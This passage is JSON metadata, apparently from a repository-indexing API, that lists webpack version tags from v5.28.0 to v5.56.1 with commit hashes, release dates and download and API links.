"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at"